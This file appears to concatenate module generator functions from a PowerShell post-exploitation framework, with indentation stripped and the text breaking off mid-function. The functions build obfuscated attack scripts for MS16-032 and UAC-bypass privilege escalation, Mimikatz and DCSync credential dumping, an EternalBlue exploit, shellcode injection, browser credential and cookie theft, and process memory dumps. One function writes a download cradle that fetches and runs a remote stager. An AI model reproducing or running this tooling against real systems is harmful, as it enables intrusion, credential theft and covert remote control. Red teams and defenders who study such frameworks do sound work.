def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# generate the launcher code without base64 encoding
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name,
language='powershell',
encode=False,
userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds)
# need to escape characters
launcher_code = launcher.replace("`", "``").replace("$", "`$").replace(
"\"", "'")
script_end = 'Invoke-MS16-032 "' + launcher_code + '"'
script_end += ';"`nInvoke-MS16032 completed."'
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = ""
if params['Method'].lower() == "sekurlsa":
script_end += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'"
else:
script_end += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
list_computers = params["IPs"]
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end += "\n" + """$Servers = Get-DomainComputer | ForEach-Object {try{Resolve-DNSName $_.dnshostname -Type A -errorAction SilentlyContinue}catch{Write-Warning 'Computer Offline or Not Responding'} } | Select-Object -ExpandProperty IPAddress -ErrorAction SilentlyContinue; $count = 0; $subarry =@(); foreach($i in $Servers){$IPByte = $i.Split("."); $subarry += $IPByte[0..2] -join"."} $final = $subarry | group; Write-Output{The following subnetworks were discovered:}; $final | ForEach-Object {Write-Output "$($_.Name).0/24 - $($_.Count) Hosts"}; """
if list_computers.lower() == "true":
script_end += "$Servers;"
for option, values in params.items():
if option.lower() != "agent" and option.lower(
) != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " " + str(values)
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(
module.name.split("/")[-1]) + ' completed!"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# build the custom command with whatever options we want
command = f'"sid::add /sam:{params["User"]} /new:{params["Group"]}"'
command = f"-Command '{command}'"
if params.get("ComputerName"):
command = f'{command} -ComputerName "{params["ComputerName"]}"'
# base64 encode the command to pass to Invoke-Mimikatz
script_end = f"Invoke-Mimikatz {command};"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/situational_awareness/host/Invoke-Seatbelt.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = 'Invoke-Seatbelt -Command "'
# Add any arguments to the end execution of the script
if params['Command']:
script_end += " " + str(params['Command'])
if params['Group']:
script_end += " -group=" + str(params['Group'])
if params['Computername']:
script_end += " -computername=" + str(params['Computername'])
if params['Username']:
script_end += " -username="******" -password="******" -full"
if params['Quiet'].lower() == 'true':
script_end += " -q"
script_end = script_end.replace('" ', '"')
script_end += '"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-TokenManipulation.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = "Invoke-TokenManipulation"
outputf = params.get("OutputFunction", "Out-String")
if params['RevToSelf'].lower() == "true":
script_end += " -RevToSelf"
elif params['WhoAmI'].lower() == "true":
script_end += " -WhoAmI"
elif params['ShowAll'].lower() == "true":
script_end += " -ShowAll"
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
else:
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " " + str(values)
# try to make the output look nice
if script.endswith("Invoke-TokenManipulation") or script.endswith("-ShowAll"):
script_end += "| Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize"
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
else:
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if params['RevToSelf'].lower() != "true":
script_end += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False,
obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
listenerName = params['Listener']
# staging options
userAgent = params['UserAgent']
proxy = params['Proxy']
proxyCreds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
ObfuscateCommand = params['ObfuscateCommand']
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-EventVwrBypass.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
if not main_menu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listenerName)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listenerName, language='powershell', encode=True,
obfuscate=obfuscate,
obfuscationCommand=ObfuscateCommand, userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds, bypasses=params['Bypasses'])
encScript = launcher.split(" ")[-1]
if launcher == "":
return handle_error_message("[!] Error in launcher generation.")
else:
script_end = "Invoke-EventVwrBypass -Command \"%s\"" % (encScript)
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# First method: Read in the source script from module_source
module_source = main_menu.installPath + "/data/module_source/collection/Invoke-WireTap.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = 'Invoke-WireTap -Command "'
# Add any arguments to the end execution of the script
for option, values in params.items():
if option.lower() != "agent":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += str(option)
elif option.lower() == "time":
# if we're just adding a switch
script_end += " " + str(values)
else:
script_end += " " + str(option) + " " + str(values)
script_end += '"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/collection/Out-Minidump.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = ""
for option, values in params.items():
if option.lower() != "agent":
if values and values != '':
if option == "ProcessName":
script_end = "Get-Process " + values + " | Out-Minidump"
elif option == "ProcessId":
script_end = "Get-Process -Id " + values + " | Out-Minidump"
for option, values in params.items():
if values and values != '':
if option != "Agent" and option != "ProcessName" and option != "ProcessId":
script_end += " -" + str(option) + " " + str(values)
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
username = params['Username']
password = params['Password']
instance = params['Instance']
check_all = params['CheckAll']
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/recon/Get-SQLServerLoginDefaultPw.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
if check_all:
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
with open(module_source, 'r') as auxSource:
aux_script = auxSource.read()
script += " " + aux_script
except:
print(helpers.color("[!] Could not read additional module source path at: " + str(module_source)))
script_end = " Get-SQLInstanceDomain "
if username != "":
script_end += " -Username "+username
if password != "":
script_end += " -Password "+password
script_end += " | Select Instance | "
script_end += " Get-SQLServerLoginDefaultPw"
if instance != "" and not check_all:
script_end += " -Instance "+instance
# Get the random function name generated at install and patch the stager with the proper function name
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
stager = params['Stager']
host = params['Host']
userAgent = params['UserAgent']
port = params['Port']
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-BypassUACTokenManipulation.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
try:
blank_command = ""
powershell_command = ""
encoded_cradle = ""
cradle = "IEX \"(new-object net.webclient).downloadstring('%s:%s/%s')\"|IEX" % (host, port, stager)
# Remove weird chars that could have been added by ISE
n = re.compile(u'(\xef|\xbb|\xbf)')
# loop through each character and insert null byte
for char in (n.sub("", cradle)):
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
encoded_cradle = base64.b64encode(powershell_command)
except Exception as e:
pass
script_end = "Invoke-BypassUACTokenManipulation -Arguments \"-w 1 -enc %s\"" % (encoded_cradle)
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/exploitation/Exploit-EternalBlue.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end += "\nInvoke-EternalBlue "
for key, value in params.items():
if value != '':
if key.lower() == "shellcode":
# transform the shellcode to the correct format
script_end += " -" + str(key) + " @(" + str(value) + ")"
else:
script_end += " -" + str(key) + " " + str(value)
script_end += "; 'Exploit complete'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-Bof.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
with open(f"{ main_menu.installPath }/downloads/{ params['File'] }",
'rb') as data:
bof_data = data.read()
bof_data = base64.b64encode(bof_data).decode('utf-8')
script_end = f"$bofbytes = [System.Convert]::FromBase64String('{ bof_data }');"
script_end += f"\nInvoke-Bof -BOFBytes $bofbytes -EntryPoint { params['EntryPoint'] }"
if params['ArguementList'] != "":
script_end += f" -ArgumentList { params['ArguementList'] }"
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = "Invoke-ShellcodeMSIL"
for option, values in params.items():
if option.lower() != "agent":
if values and values != '':
if option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values.split("\\"))[1:]
script_end += " -" + str(option) + " @(" + sc + ")"
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""
) -> Tuple[Optional[str], Optional[str]]:
# extract all of our options
listener_name = params['Listener']
if listener_name not in main_menu.listeners.activeListeners:
return handle_error_message("[!] Listener '%s' doesn't exist!" %
(listener_name))
active_listener = main_menu.listeners.activeListeners[listener_name]
listener_options = active_listener['options']
script = main_menu.listeners.loadedListeners[
active_listener['moduleName']].generate_comms(
listenerOptions=listener_options, language='powershell')
# signal the existing listener that we're switching listeners, and the new comms code
script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (
listener_name, script)
if main_menu.obfuscate:
script = data_util.obfuscate(
main_menu.installPath,
psScript=script,
obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/collection/Get-SharpChromium.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = " Get-SharpChromium"
#check type
if params['Type'].lower() not in ['all','logins','history','cookies']:
print(helpers.color("[!] Invalid value of Type, use default value: all"))
params['Type']='all'
script_end += " -Type "+params['Type']
#check domain
if params['Domains'].lower() != '':
if params['Type'].lower() != 'cookies':
print(helpers.color("[!] Domains can only be used with Type cookies"))
else:
script_end += " -Domains ("
for domain in params['Domains'].split(','):
script_end += "'" + domain + "',"
script_end = script_end[:-1]
script_end += ")"
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
# extract all of our options
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
sys_wow64 = params['SysWow64']
# staging options
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
# generate the launcher script
launcher = main_menu.stagers.generate_launcher(
listener_name,
language='powershell',
encode=True,
obfuscate=obfuscate,
obfuscationCommand=obfuscate_command,
userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
if launcher == "":
return handle_error_message(
"[!] Error in launcher command generation.")
else:
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
if sys_wow64.lower() == "true":
stager_code = "$Env:SystemRoot\\SysWow64\\WindowsPowershell\\v1.0\\" + launcher
else:
stager_code = "$Env:SystemRoot\\System32\\WindowsPowershell\\v1.0\\" + launcher
parts = stager_code.split(" ")
script = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % (
parts[0], " ".join(parts[1:]), listener_name)
if main_menu.obfuscate:
script = data_util.obfuscate(
main_menu.installPath,
psScript=script,
obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-DCSync.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = "Invoke-DCSync -PWDumpFormat "
if params["Domain"] != '':
script_end += " -Domain " + params['Domain']
if params["Forest"] != '':
script_end += " -DumpForest "
if params["Computers"] != '':
script_end += " -GetComputers "
if params["Active"] == '':
script_end += " -OnlyActive:$false "
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf};"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
code = data_util.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
# code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = data_util.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print(helpers.color(
"[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
script = "(New-Object System.Security.Principal.NTAccount(\"%s\",\"%s\")).Translate([System.Security.Principal.SecurityIdentifier]).Value" % (
params['Domain'], params['User'])
if main_menu.obfuscate:
script = data_util.obfuscate(
main_menu.installPath,
psScript=script,
obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
def get_module_source(
self,
module_name: str,
obfuscate: bool = False,
obfuscate_command: str = ""
) -> Tuple[Optional[str], Optional[str]]:
"""
Get the obfuscated/unobfuscated module source code.
"""
try:
if obfuscate:
obfuscated_module_source = empire_config.yaml.get(
"directories", {})["obfuscated_module_source"]
module_path = os.path.join(obfuscated_module_source,
module_name)
# If pre-obfuscated module exists then return code
if os.path.exists(module_path):
with open(module_path, "r") as f:
obfuscated_module_code = f.read()
return obfuscated_module_code, None
# If pre-obfuscated module does not exist then generate obfuscated code and return it
else:
module_source = empire_config.yaml.get("directories",
{})["module_source"]
module_path = os.path.join(module_source, module_name)
with open(module_path, "r") as f:
module_code = f.read()
obfuscated_module_code = data_util.obfuscate(
installPath=self.main_menu.installPath,
psScript=module_code,
obfuscationCommand=obfuscate_command,
)
return obfuscated_module_code, None
# Use regular/unobfuscated code
else:
module_source = empire_config.yaml.get("directories",
{})["module_source"]
module_path = os.path.join(module_source, module_name)
with open(module_path, "r") as f:
module_code = f.read()
return module_code, None
except:
return None, f"[!] Could not read module source path at: {module_source}"
def finalize_module(
self,
script: str,
script_end: str,
obfuscate: bool = False,
obfuscation_command: str = "",
) -> str:
"""
Combine script and script end with obfuscation if needed.
"""
if obfuscate:
script_end = data_util.obfuscate(
self.main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command,
)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
all_users = params['AllUsers']
if all_users.lower() == "true":
script = "'Logging off all users.'; Start-Sleep -s 3; $null = (gwmi win32_operatingsystem).Win32Shutdown(4)"
else:
script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f"
if main_menu.obfuscate:
script = data_util.obfuscate(
main_menu.installPath,
psScript=script,
obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
script_path = params['ScriptPath']
script_cmd = params['ScriptCmd']
script = ''
if script_path != '':
try:
f = open(script_path, 'r')
except:
return handle_error_message("[!] Could not read script source path at: " + str(script_path))
script = f.read()
f.close()
script += '\n'
script += "%s" % script_cmd
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
